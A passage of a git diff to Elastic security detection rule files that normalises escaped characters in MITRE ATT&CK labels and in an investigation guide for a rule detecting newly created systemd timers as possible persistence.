], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json index 157fcd79d83..3d9620b7cc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json index e1e02dcf169..5d52fd795cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json index 94e63c83937..bf209d66503 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json index c2a392f0727..24bf79a3f9c 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json +++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json index 9bd2b10a88e..242174c4f60 100644 --- a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json +++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json index 66680a1e69e..ea6bffb4c5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json index 7a5cf87fda4..a2bb9d2f3ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json index 47675834282..be4c14cbbfe 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json index fae519b49f7..67da5e2f11c 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/proc/self/exe\" or \"/usr/sbin/dockerd\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json index 2bd1b734cc0..ec1a4d7ef3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, 